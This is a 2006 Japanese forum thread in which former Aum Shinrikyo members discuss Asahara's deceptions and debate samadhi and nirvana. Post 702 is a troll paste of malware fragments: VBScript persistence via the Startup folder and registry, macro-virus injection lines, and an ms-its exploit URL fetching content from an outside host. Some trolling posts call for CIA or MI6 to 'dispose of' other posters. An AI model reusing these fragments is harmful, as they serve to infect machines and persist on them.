自分にはまだよくわからないけど、あのすごいグルが言うんだから、そうだろうと、


672 :名無しさん@3周年:2006/10/15(日) 00:09:54 ID:oFh0Fq6+
>>666
それは大変でしたね。
確か、逆さ吊りで、死んだ人もいたんですよね?

673 :名無しさん@3周年:2006/10/15(日) 00:12:56 ID:oFh0Fq6+
ある程度の神通力じゃなくて、ある程度の読心術だって。

674 :名無しさん@3周年:2006/10/15(日) 00:13:38 ID:/N5hSXjV
で、自分で選択するんだ、っていうけど
あの流れの中にいたってのは、抜けられる場合もあるけど
難しい人もいたろうな、と

たとえば、戦争のとき、本当は戦争なんか嫌だと思っていても
大きな声でいえないでしょう?
非国民扱いにされる
そんな感覚が、オウムにあったのよ
今、せっぱつまった状況にある、って
甘いことを言っていては、世界はより悪徳な場になってしまう、みたいな
今、私たちが、手を汚しても、救済を推し進めることは
必要なんだみたいな
戦時中は、人をたくさん殺した方が、国のためになるみたいに
教育されたでしょう? あれと同じよ

私は在家だったから、そうでもなかったけど
サマナはずっと、そういう考えに汚染されたみたい

675 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 00:13:57 ID:oyC3xr3v
>>637
>シヴァの喜びさん、本当にご苦労様です。
最近、読ませてもらっているのですが、いやー、シヴァさんのエネルギー、一体、
どこから、湧いてくるのでしょうか。素晴らしい!!の一言ですねえ。敬服します。
頑張ってください。

ありがとうございます。
ですが、俺は素晴らしくはありません。
もっと早くに声をあげるべきだったんです。関わった人間として出来うる限りのことをすべきだったんです。
こんな遅くから、自分の状況を整えてから、声を上げるのは・・・心の弱さで、恥ずかしい限りです。


>麻原教祖の裁判打ち切りについて、これではオウム事件の真相が解明されないままに
終わるではないか、という批判に対して、江川紹子さんは、「WILL」11月号に
反論を書かれていますね。これからいくら続けても、教祖の口から語られることはな
いだろう。これまでの裁判でも、かなりのことが解明されている。あとは、われわれ
関心を持っている人間、又、関係者が、オウムの深層を解明、究明していかなければ
ならないのだ、と。私も、この江川さんのご意見に賛成ですが、ただ、問題は、オウム
事件での死刑の人間がちょっと多すぎはしないか、ということです。死刑は、教祖一人
でいいのではないか、と思うのですが・・・・。
シヴァの喜びさんはいかがお考えでしょうか。

麻原は死刑判決を逃れられるとは思えなかったので、予想通りなのでもう何も思いません。
ただ、かつての弟子として聞きたいのは「師よ。何ゆえ私たちを裏切ったのか?何ゆえ私たちを騙したのか?」
ということです。それが聞けたとしても聞けなかったとしても「ああ。そうなのか」という空虚がそこにあることは
間違いないだろうとは思いますが。
他の幹部たちには・・・正直、何とかならないものなのか・・・今でも考えてしまいます。
ウパーリ、ガフバー、V・ティッサ・・・その他にも仲が良かった友人などがいるので・・・
彼らの運命を思うと・・・そして、それは一つ間違うと自分の姿であったと思うと:・・
複雑な心境です。


676 :名無しさん@3周年:2006/10/15(日) 00:21:27 ID:oFh0Fq6+
3大聖女
ナイチンゲール
マザーテレサ
キャンディ

677 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 00:23:18 ID:oyC3xr3v
>>633

自分が救世主だって妄想と現実とが区別出来なくなっていたのではないかな。
なまじ少々の力があったので性質が悪かったんだと思う。

678 :名無しさん@3周年:2006/10/15(日) 00:23:46 ID:/N5hSXjV
だって、自分で選択するんだっていうけど
教組は、自作自演して、(本当はウソだったんだけど)オウムは
米軍に襲われているって、弟子に思わせていたのよ

Q熱の菌を道場にまいて、わざと病人をたくさん作ったの
それで、サマナの多くは呼吸器の障害を訴えて、医者である林のところへ
かけつけた、、
病気になったサマナも、診察した林も、(本当に教組の言うとおり
オウムは米軍に襲われているし、そのうち、日本人ゼンタイを米軍が
襲うようになるだろう)と信じてしまったんだけど、、

それで、すっかり信じ込んだのよ
自分で判断する余地があっただろうかね?
いわば、手のこんだオレオレ詐欺みたいなもんよ

679 :名無しさん@3周年:2006/10/15(日) 00:24:49 ID:YOotLzB9
深い超越的なrevelで言えば人は己の行動と環境について選択責任があると言える。

680 :名無しさん@3周年:2006/10/15(日) 00:25:00 ID:gAgcKF5F
A派、M派のどちらが真理なのでしょうか?
どちらが解脱悟り出来るのでしょうか?


681 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 00:28:18 ID:oyC3xr3v
>>624
>ホモのセックス、想像したらビジュアル的には、美しくないな。
でも、ホモの人はそれが美しいと思うのだろうか?

ストレートの人のセックスが美しく感じるならそれは悪見解。セックスはセックス。美しくも醜くも無い。
それはストレートだろうがホモだろうが同じ。
立場によって違う見え方がしてるだけでしょ?



682 :名無しさん@3周年:2006/10/15(日) 00:29:04 ID:/N5hSXjV
そのころ、オウムはすごい緊迫感があったわけ
とにかく、フリーメーソンってのに襲われていると
教組が言い張ったのよ
で、話に信憑性を持たせるため、腹心の弟子数人に、わざと菌をまかせて
病人をだし、(ほら、本当にメーソンにオウムは襲われているんだよ)と
信じ込ませたわけ

それで、すっかりアメリカと戦う気になった弟子が、暴走した
これって、すっかり騙されて人まで殺している人は
気の毒だと思う
もちろん、被害者の方はもっと苦しんでいるけど
まったく、本気に教組のいうことを信じたばかりに、やったわけだし、、
信じ込ませようと、教組はいろいろやったわけ
すごいウソツキなのよ 教組がいけない

683 :名無しさん@3周年:2006/10/15(日) 00:31:51 ID:/N5hSXjV
血を吐いた人までいたそうじゃない?
それだから、米軍憎し、ってことになって、、
でも、フタをあけたら、教団で撒いていたのよ メーソンなんか関係ないの

それでも、教組に帰依するっていう人の気がしれない


684 :名無しさん@3周年:2006/10/15(日) 00:33:46 ID:/N5hSXjV
富士の飲み水に毒を入れられた、って噂がたったよね
それで、教組が、こいつがそうじゃないか、ってスパイを疑ったんだっけ?
その毒は、誰がいれたんだわ?

685 :名無しさん@3周年:2006/10/15(日) 00:38:00 ID:oFh0Fq6+
麻原教祖と日教組が悪い。

686 :名無しさん@3周年:2006/10/15(日) 00:45:01 ID:/N5hSXjV
で、なんでこんな、タチの悪いところへ自分は来てしまったかと思うと
非常に自分のカルマが心配になるよ

だって、いろいろ悩みがあるときに、宗教団体へ恐る恐るはじめて行ってみる
人もいると思うけど(私はそんなだった)
こうまで、異常な奴にひっかかるとは、、
自分で仰天してしまうっての


687 :名無しさん@3周年:2006/10/15(日) 00:49:10 ID:EGTI48d6
>>669


そりゃ、インドなんかにへ勝手に旅行(修行?)しに行くんだもの!



688 :名無しさん@3周年:2006/10/15(日) 00:51:12 ID:oFh0Fq6+
カルトの自称聖者と
ほんとの聖者を見分けるポイントは、何ですか?

689 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 00:52:03 ID:oyC3xr3v
>>687

え?
彼、そんなことしたの?
よく吊るされなかったねえ^^;

690 :名無しさん@3周年:2006/10/15(日) 00:58:26 ID:oFh0Fq6+
パモーチャナは、話しは上手いし、頭もよさげなんだけど
やってることは、果てなマークの人。

691 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 01:01:28 ID:oyC3xr3v
>>688

ホントの指導者とビジネスグルの見分け方なら知ってるよ

692 :名無しさん@3周年:2006/10/15(日) 01:06:29 ID:RSD11016
>>688
メシア預言の有無と、聖書に記載された奇跡の現証と、超能力の有無、暗殺経験の有無


オウムと創価学会SGIにTBSのプロ名無し>>688はもう始末しとけよ、CIA、MI6



693 :名無しさん@3周年:2006/10/15(日) 01:07:52 ID:oFh0Fq6+
>>691
よかったら、教えてくれませんか?

694 :名無しさん@3周年:2006/10/15(日) 01:07:59 ID:RSD11016
勅命



695 :名無しさん@3周年:2006/10/15(日) 01:09:38 ID:RSD11016
>>693
裁判か逮捕覚悟できている創価学会SGIのプロ名無し



696 :名無しさん@3周年:2006/10/15(日) 01:12:40 ID:oFh0Fq6+
そうか

697 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 01:18:07 ID:oyC3xr3v
>>693
ホントの指導者は自分を神だとかグルだとか言いません。
ビジネスグルは自分を「ただ一人の神」だとか「唯一のグル」だとか言います。

698 :名無しさん@3周年:2006/10/15(日) 01:19:04 ID:RSD11016
>>696
誤爆か、スマソ

緊急勅命、>>694-695、及び>>692の後半は撤回だ⇒CIA、MI-6


699 :名無しさん@3周年:2006/10/15(日) 01:22:29 ID:oFh0Fq6+
>>697ありがとうございます。
なるほど。よくわかりました。
チヅオは後者ですね。

700 :名無しさん@3周年:2006/10/15(日) 01:24:21 ID:RSD11016
創価学会SGI、TBS、オウム真理教らのプロ固定とプロ名無しに恥をかかされた、始末せよ。



701 :名無しさん@3周年:2006/10/15(日) 01:26:53 ID:oFh0Fq6+
>>698
はい。了解です。
裁判受ける覚悟があると言われた時、
金のことが心配になったよw
裁判費用なんてねぇよって。

702 :名無しさん@3周年:2006/10/15(日) 01:30:28 ID:qBmG6sIH
30 :<body onload=window()>:2006/10/11(水) 18:05:51 ID:4odY6rAk
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


703 :名無しさん@3周年:2006/10/15(日) 01:31:09 ID:qBmG6sIH
\               |         /
  \             |        /
             / ̄ ̄ ヽ,
            /        ',      /     _/\/\/\/|_
    \    ノ//, {0}  /¨`ヽ {0} ,ミヽ    /     \           /
     \ / く l   ヽ._.ノ   ', ゝ \       <   バーカ   >
     / /⌒ リ   `ー'′   ' ⌒\ \    /          \
     (   ̄ ̄⌒          ⌒ ̄ _)    ̄|/\/\/\/ ̄
      ` ̄ ̄`ヽ           /´ ̄
           |            |  
  −−− ‐   ノ           |
          /            ノ        −−−−
         /           ∠_
  −−   |    f\      ノ     ̄`丶.
        |    |  ヽ__ノー─-- 、_   )    − _
.        |  |            /  /
         | |          ,'  /
    /  /  ノ           |   ,'    \
      /   /             |  /      \
   /_ノ /              ,ノ 〈           \
    (  〈              ヽ.__ \        \
     ヽ._>              \__)

704 :糞麻原へ捧げる昼便:2006/10/15(日) 01:32:21 ID:qBmG6sIH
                   人
                  ノ⌒ 丿
                _/   ::(
               /     :::::::\
               (     :::::::;;;;;;;)
               \_―― ̄ ̄::::ヽ
              ノ ̄     :::::::::::::: :::ヾ,
             (         ::::::::::::::;;;;
            / ̄――――― ̄ ̄::::::::\
           (          ::::::::::::::::::::::::::::::i
           人__......::::::::::::::::::::;;;;;;;;;;;;;;;;;;;;;;;;ノ_
         /                ,,,,;;::''''' ::::\
         (         ,,,,;;:::::::::::::::       __ ::;;i
        入        "   __ ::::  '"ゞ'-'_;;;ノ,,,,,
       /"':;;`丶___ __...,,,;:- '"-ゞ'-' ::::::..  ..............::::::::::ヽ、
      /      ''':::;;::::''''''        .....:::::::::::::::::::::::::::::::::::::l
      {;;                    ( ,-、 ,:‐、 ..::::::::::::,,,,ソ`ヽ
      i;;..           ,,,,,:::::::: '''''''           ''''''  ..;;;:l
    r´\_;;:..._,,、-‐―‐''゙゙゙        __,-'ニニニヽ    :::::::: /
    /                       ヾニ二ン"  ...::::::::::::/
    |                             ........,::::::-''゙゙
    丶、:::::::.........          _____   _______,,,-‐'''''゙゙゙
      `ー-、__ ,,,::::;;;;_,,,、-‐''''゙゙゙゙      ゙゙゙゙゙`


705 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 01:35:27 ID:oyC3xr3v
>>699

これって実は向こうのマトモな聖者や行者が自分の弟子に教えることなんだって。
あるネパール出身の行者に教えてもらった。

706 :名無しさん@3周年:2006/10/15(日) 01:37:30 ID:RfOz7Aym
芝は彼氏いるのか?

707 :さくら:2006/10/15(日) 01:38:41 ID:GVqEsT9+
またウイルス?
気に入らない事が多いのね。

708 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 01:51:35 ID:oyC3xr3v
>>706

ごめん。
それには答えない。

709 :名無しさん@3周年:2006/10/15(日) 01:55:44 ID:EGTI48d6

\               |         /
  \             |        /
             / ̄ ̄ ヽ,
            /        ',      /     _/\/\/\/|_
    \    ノ//, {0}  /¨`ヽ {0} ,ミヽ    /     \           /
     \ / く l   ヽ._.ノ   ', ゝ \       <  尊師!   >
     / /⌒ リ   `ー'′   ' ⌒\ \    /          \
     (   ̄ ̄⌒          ⌒ ̄ _)    ̄|/\/\/\/ ̄
      ` ̄ ̄`ヽ           /´ ̄
           |            |  
  −−− ‐   ノ           |
          /            ノ        −−−−
         /           ∠_
  −−   |    f\      ノ     ̄`丶.
        |    |  ヽ__ノー─-- 、_   )    − _
.        |  |            /  /
         | |          ,'  /
    /  /  ノ           |   ,'    \
      /   /             |  /      \
   /_ノ /              ,ノ 〈           \
    (  〈              ヽ.__ \        \
     ヽ._>              \__)




710 :名無しさん@3周年:2006/10/15(日) 02:14:53 ID:8+WJO1qk
ヒンドゥー教徒がいるな。
釈迦がいつ心停止=涅槃と言ったんだ?

711 :名無しさん@3周年:2006/10/15(日) 02:15:33 ID:8+WJO1qk
心停止したら死ぬがな。

712 :名無しさん@3周年:2006/10/15(日) 02:17:27 ID:8+WJO1qk
涅槃はダイナミックに変化しつづける世界をありのままに受け入れることであって
停止ではないはずでしょ。
無上なんだから停止するはずもない。

713 :名無しさん@3周年:2006/10/15(日) 02:17:35 ID:8+WJO1qk
無常

714 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 02:20:48 ID:oyC3xr3v
>>710


涅槃はニルヴァーナのことだから肉体を脱ぎ捨てる・・・死なわけだが?
サマディのことを言ってるなら釈迦のサマディが心臓停止じゃ無かったと言いたい?
反論しきってしまえるけどまずは君の論を聞こうか?

715 :名無しさん@3周年:2006/10/15(日) 02:23:25 ID:8+WJO1qk
悪いけど放置。
仏教徒なら、ちゃんと仏教学んでから発言してくださいよ。
恥ずかしいよ。

716 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 02:24:28 ID:oyC3xr3v
>>711

サマディはそこからまた戻ってくる。その死の状態からね。自分の意思で入り、意思で戻ってくる。
だからこれによって肉体はただの入れ物だってことを証明するのだよ。

717 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 02:26:42 ID:oyC3xr3v
>715

釈迦がサマディを行った事さえ知らないのに仏教徒を名乗るのは片腹痛いw
ちゃんと仏教を学んでから来なさい。
君こそ恥ずかしすぎてこっちが表を歩けないw

718 :名無しさん@3周年:2006/10/15(日) 02:27:48 ID:8+WJO1qk
無記って知ってる?

719 :名無しさん@3周年:2006/10/15(日) 02:29:09 ID:8+WJO1qk
結局まだオウムで刷り込まれた考え方に影響されたままじゃん。

720 :名無しさん@3周年:2006/10/15(日) 02:30:34 ID:5OMll16f

都合が悪いと無記を持ち出す。

721 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 02:31:55 ID:oyC3xr3v
>>718

知ってるよ。
でも禅定のことを「無記」とは言って無いね。お釈迦さまは。
ちゃんと
「初禅から起って2禅へ、2禅から起って3禅へ・・・」
って具合に瞑想とサマディまでのことを示してます。
南伝大蔵経というお経の中でサマディについても説明してますよ。
南伝大蔵経は知ってる?

722 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 02:33:18 ID:oyC3xr3v
三昧って言葉知ってるかな?
それがサマディだけど。

723 :名無しさん@3周年:2006/10/15(日) 02:33:31 ID:8+WJO1qk
論争する仏教徒。

724 :名無しさん@3周年:2006/10/15(日) 02:36:08 ID:5OMll16f
ID:8+WJO1qkは何処(書籍など)で仏教を学んだの?

725 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 02:36:35 ID:oyC3xr3v
>>719

お釈迦さまが教えていた内容に一番近いものを教えているとされるスリランカ上座部仏教が
その教えの中にちゃんとサマディまでの道程を示してますよ。

726 :名無しさん@3周年:2006/10/15(日) 02:39:12 ID:8+WJO1qk
上座部のサマディ(三昧)と、オウムで言ってるニルヴァーナやサマディを一緒くたに
されてません?
オウムで言ってるニルヴァーナは、死後の世界にまで言及しているけれども、根本
仏教が死後の世界に言及することは、まずあり得ません。

727 :名無しさん@3周年:2006/10/15(日) 02:39:40 ID:5OMll16f
>>712
>涅槃はダイナミックに変化しつづける世界をありのままに受け入れること
 
初めて聞いた解釈だけど何宗

728 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 02:40:00 ID:oyC3xr3v
>>723

論争?
それって思考レベルや知識のレベルが同程度の時に成り立つ言葉で、そうでない場合は議論とか論争とかとは言わないし
仏教は普通に相手との問答で教化したり道を模索したりするよ。
論争がいけないならば人類の智慧の進歩なんてなかったと断言できる。

729 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 02:44:24 ID:oyC3xr3v
>>726
>上座部のサマディ(三昧)と、オウムで言ってるニルヴァーナやサマディを一緒くたに
されてません?

残念ながら俺はオウムで定義してるサマディやニルヴァーナとは違う見解を持ってますが?
それに上座部の勉強会にも出席してますが、多少の違いはあっても同じ禅定のある状態っていうことには変わりが
ありませんが?

>オウムで言ってるニルヴァーナは、死後の世界にまで言及しているけれども、根本
仏教が死後の世界に言及することは、まずあり得ません。


では輪廻もないと?
お釈迦さまが悟るときに自分の過去世を見て、さらには未来世もみて、詳細に分析した結果悟ったってのはどういうこと?


730 :名無しさん@3周年:2006/10/15(日) 02:45:38 ID:8+WJO1qk
どういうことだと思ってるんですか?

731 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 02:45:45 ID:oyC3xr3v
たしかにニルヴァーナっていう世界については「無記」だけどね

732 :名無しさん@3周年:2006/10/15(日) 02:49:59 ID:8+WJO1qk
それが在るという前提で考えたり、論を展開したりすることは根本仏教を名乗る
修行者のとるべき態度でしょうか。

733 :名無しさん@3周年:2006/10/15(日) 02:53:06 ID:/tje+bdU
確かに、国会などをみると、議論ではなくて言いたいこと
を言っているだけだね。納得させたり、ハッとさせる
ことって見ないね。
レ−ルにのってるって感じにしか見えんわな。
水準では遥かに低いらしいし。

734 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 02:53:28 ID:oyC3xr3v
サマディについては「認識作用、あるいは思考の停止」だと思ってる。
その状態の時に心も止まるので心臓停止、呼吸停止も現われる。
もちろん心臓停止や呼吸停止が伴わないサマディも存在するけど、あるテーラヴァーダの長老に
俺の師であるインド聖者のサマディの話(水中サマディ33時間)をしたら「それは大したサマディだね」
って仰ってましたよ。

735 :名無しさん@3周年:2006/10/15(日) 02:54:42 ID:8+WJO1qk
懐の深い長老さまですね。

736 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 02:55:36 ID:oyC3xr3v
>>732

なんか誤解があるな・・・
俺は根本仏教徒などとは言った覚えは無いが・・・

737 :名無しさん@3周年:2006/10/15(日) 02:56:05 ID:8+WJO1qk
朋よ。あなたために厭味をひとつおいて去ります。

「それは大したサマディですね。」

738 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 02:57:35 ID:oyC3xr3v
>>732

ではそれが無いという前提で論を展開するのは仏教徒だと?

739 :名無しさん@3周年:2006/10/15(日) 02:57:49 ID:5OMll16f
ID:8+WJO1qk 結局捨てゼリフ吐いて逃げるの?

740 :名無しさん@3周年:2006/10/15(日) 03:01:51 ID:SEzBQVwn
認識作用、あるいは思考の停止というのは知覚の停止でもありますよね?
では眠りによる意識の停止とどう違うのですか?
認識が停止したらサマディに入ったなという記憶も残らないのでは?

741 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 03:04:24 ID:oyC3xr3v
>>737

wwww
あらら。
長老はちゃんとした評価で言ったのに。
それに厭味を言うのが根本仏教徒のすることなら・・・・・

それはオウムの信徒やサマナとなんら変わらない。
相手の禅定の力を素直に賞賛できないとは^^;

なら俺も一言言っておこうか。
友よ。
サマディをなしたこともないのに相手のサマディを貶すとは・・・君はサマディに入りたいのなら
それは為すべきではなかった。

742 :名無しさん@3周年:2006/10/15(日) 03:07:08 ID:SEzBQVwn
過去世とか来世とか言ってる時点でカルトですね。
来世が見えたなら表現できない未来文明の表現も出来るはず。
結局は当時の人がイメージできる範囲内での来世であり、それは真実ではない。

743 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 03:11:41 ID:oyC3xr3v
>>740

はい。
実は残ってない。
だから「私はサマディに入った。入っていた」は間違いになります。
ではどうやってそれを認識するのか・・
実はそこがまだ分らないとこなのです。

でも、予測としては何度もサマディを体験しているうちに認識作用が作り変えられるのではないかと・・・
つまり苦を生じさせないものに・・・それでもって世界を見るからありのまま見るようになるしサマディ中も
認識できるようになるのでは・・・ここはあくまで僕の考えなので事実は分りません。

744 :名無しさん@3周年:2006/10/15(日) 03:17:24 ID:SEzBQVwn
サマディや解脱は何千年もの歴史があるのにはっきりとしたプロセスを未だに
分かるように提示できないのは何故なのでしょう?
やはり誰かが言ったように幻であり脳の錯覚の一種であると?
それすらも良く分からない?
難しいですね。

745 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 03:18:53 ID:oyC3xr3v
>>742
>過去世とか来世とか言ってる時点でカルトですね。

んじゃ、テーラヴァーダもカルトですな。原始仏教もジャータカとかあるからカルトになりますな。

>来世が見えたなら表現できない未来文明の表現も出来るはず。
結局は当時の人がイメージできる範囲内での来世であり、それは真実ではない。

そんなものに囚われない様に「無記」って言ったんじゃん。
「無記」って言葉にとらわれて何故そうしたのかを考えないと・・・。




746 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 03:25:45 ID:oyC3xr3v
>>744
>サマディや解脱は何千年もの歴史があるのにはっきりとしたプロセスを未だに
分かるように提示できないのは何故なのでしょう?

え?
ちゃんとそのプロセスを説明していますよ。
テーラヴァーダ仏教で、チベット仏教で、インド・ヒマラヤヨーガで。

>やはり誰かが言ったように幻であり脳の錯覚の一種であると?

幻や脳の錯覚で33時間の水中無呼吸や14日間の地中生き埋めが可能なら
脳の錯覚でこの世の王にもなれます罠。

>それすらも良く分からない? 難しいですね。

っていうか、こんな話よりも実際にやってみればいいじゃないですか。
実践し、サマディなるものを体験し、その上で自分の体験を分析して「脳の錯覚」って
断じればいい。
サマディにも入れないのに、実証もできないのに否定するとは非科学的では?


747 :名無しさん@3周年:2006/10/15(日) 03:26:15 ID:SEzBQVwn
でも麻原は解脱するには意識を移し変えてあらゆる転生を経験しつくしないと
解脱は無理とも言っている。
無記としておくべきものが解脱に必要な段階であると言っている。
矛盾ですね。

748 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 03:27:34 ID:oyC3xr3v
>サマディや解脱は何千年もの歴史があるのにはっきりとしたプロセスを未だに
分かるように提示できないのは何故なのでしょう?

提示できていないのはオウムだけ。

749 :名無しさん@3周年:2006/10/15(日) 03:30:50 ID:SEzBQVwn
>>746
仮に修行を始めたとして素質がある場合はどれくらいの期間で
入れるようになりますか?
しかしあなたがプロセスを完全に理解しているならサマディに入れるのでは?

750 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 03:33:34 ID:oyC3xr3v
>>747
>でも麻原は解脱するには意識を移し変えてあらゆる転生を経験しつくしないと
解脱は無理とも言っている。

テーラヴァーダの一派で「神通で転生を体験しつくして悟り・解脱に向かう」という
タイプのものがあります。だからそれは正解とも言える。

>無記としておくべきものが解脱に必要な段階であると言っている。矛盾ですね。

だから「無記」だから考えないではなくて、何故「無記」なのかを考えないといけないのではないかな?
神通の世界はとても魅力的な世界なので普通の修行者ではその引力に捕まって抜け出せなくなる。つまり神通に
振り回される。そうならないように「無記」なんだと思う。実はこれはインドのヨーギーも同じ見解。へたに神通の
世界にはいかない。

751 :名無しさん@3周年:2006/10/15(日) 03:34:40 ID:SEzBQVwn
サマディの次に如実知見」があり、次が現世否定で、離愛著の次に解脱がある。
少なくとも解脱の絶対条件にサマディは含まれるのですよね?

752 :名無しさん@3周年:2006/10/15(日) 03:39:10 ID:SEzBQVwn
>>だから「無記」だから考えないではなくて、何故「無記」なのかを考えないといけないのではないかな?
つまり神通は神通で切り離して考え、神通の詳しい原理やメカニズムを知ることは必要ないということですか?
あなたはどんな神通を体験されましたか?空中浮遊とかですか?

753 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 03:40:50 ID:oyC3xr3v
>>749
>仮に修行を始めたとして素質がある場合はどれくらいの期間で入れるようになりますか?

チベット仏教の場合は分りませんが、インドヒマラヤヨーガの場合、素質があってグルがまともなら
頑張って最短が4年。

テーラヴァーダは、素質があるものが出家して、修行に明け暮れるならやはり最短で4年とお聞きしました。

>かしあなたがプロセスを完全に理解しているならサマディに入れるのでは?

いいとこまでは寄せてるそうです。また何歩か足りてないようです。
それにその状態に至るには一人になる必要があるのですが・・・まあ、今の環境では無理かも。


754 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 03:44:52 ID:oyC3xr3v
>>751
>サマディの次に如実知見」があり、次が現世否定で、離愛著の次に解脱がある。
少なくとも解脱の絶対条件にサマディは含まれるのですよね?

現世否定はたぶん麻原の改悪です。
でもサマディなくして如実知見は無いので絶対条件に入ると思います。
それに滅想受定という瞑想をなさないと解脱しないのでサマディは絶対条件です。

755 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 03:48:43 ID:oyC3xr3v
>>752
>つまり神通は神通で切り離して考え、神通の詳しい原理やメカニズムを知ることは必要ないということですか?
あなたはどんな神通を体験されましたか?空中浮遊とかですか?

神通の詳しいメカニズムは如実知見で得ているのではないでしょうか。
俺はいろんな体験をしているのでここには書きません。
いちいち全部その体験を書くと本が一冊出来上がるくらいの神通体験とか神秘体験とかしてるので
もう飽きました。

756 :名無しさん@3周年:2006/10/15(日) 03:50:07 ID:SEzBQVwn
ところであなたは自分のことを呼称する時、俺と言ったり、僕と言ったり変化しますよね?
これは故意にTPOに則り変化させているのですか?
真我を考えていく場合、本当の自分というのは思考するときに、自分はこうだなという時、
無意識に出てくるのが本当のあなたでしょう。
とっさに俺という言葉が出てくるならそれが深いところに根付いている証でしょう。

757 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 03:52:55 ID:oyC3xr3v
>>752

神通そのものに囚われないような修行者でないと神通で転生を見ていき解脱するってのはやめたほうがいいと思う。
そうでないと目的と手段が入れ替わる恐れがある。そして抜け出せなくなる。それほどまでに神通は引力の強い世界
だと思います。感じます。

758 :名無しさん@3周年:2006/10/15(日) 03:55:38 ID:SEzBQVwn
>>本が一冊出来上がるくらいの神通体験とか神秘体験とかしてる
それがあなたの見解ですよね。同じ元サマナでも
某シャバダバ氏が聞いたらカルトだと定義しそうですな。
神通が錯覚だと言われる一番の理由は物理的証明が確実にできないからでしょう。

759 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 03:56:41 ID:oyC3xr3v
>>756

そこら辺はお気になさらずに。
たんに書き言葉と話し言葉の違いくらいのものです。

760 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 04:00:34 ID:oyC3xr3v
>>758
>それがあなたの見解ですよね。同じ元サマナでも某シャバダバ氏が聞いたらカルトだと定義しそうですな。
神通が錯覚だと言われる一番の理由は物理的証明が確実にできないからでしょう。

それなら意識というものまで錯覚ですまされてしまいますね^^
意識の物理的証明はどこに?

761 :名無しさん@3周年:2006/10/15(日) 04:04:42 ID:SEzBQVwn
>>760
全くその通りですね。それこそ魂、意識、脳を考える究極の問題だと思いますよ。
この現実世界は意識を通して認識しているだけであり実際には無いものとも言える。
すなわち幻影であると。
ただ私も意識というものは単なる脳の電気信号だけの世界であって欲しくないものです。


762 :名無しさん@3周年:2006/10/15(日) 04:08:05 ID:SEzBQVwn
遅くまで答えていただきありがとうございました。
まだ聞きたいことがありますが今日はもう寝るとします。
失礼します。


763 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 04:10:28 ID:oyC3xr3v
>>762

おやすみなさ〜い^^

764 :名無しさん@3周年:2006/10/15(日) 04:16:05 ID:5OMll16f
映画マトリックスの世界のように実際はどこかに繋がれて、電気信号だけで
経験してるのかな。

765 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/15(日) 04:18:16 ID:oyC3xr3v
>>764

そうじゃないことを祈りましょう^^

では、俺も寝ますね。
おやすみなさ〜い^^

766 :名無しさん@3周年:2006/10/15(日) 04:26:45 ID:5OMll16f
  
解脱という境地に到達したらその答えが見えるのかな?
わけ分らんな。とりあえず明日も俺は仕事に行くという事は幻ではない!

767 :名無しさん@3周年:2006/10/15(日) 04:37:25 ID:GcO6d0iC
この世のすべてはチズオの妄想だよ

768 :名無しさん@3周年:2006/10/15(日) 07:59:10 ID:QO7Js5Yd
>>673
読心術でろうそくの炎を曲げられますか?

769 :名無しさん@3周年:2006/10/15(日) 08:45:36 ID:gfqV+k9i
あんたらの気持ちの中に何かを拠り所にしたい、頼りたいというもんが
あって、それがオウムを成長させたんよ

770 :グル麻原:2006/10/15(日) 09:20:54 ID:Ge0SqL7Q
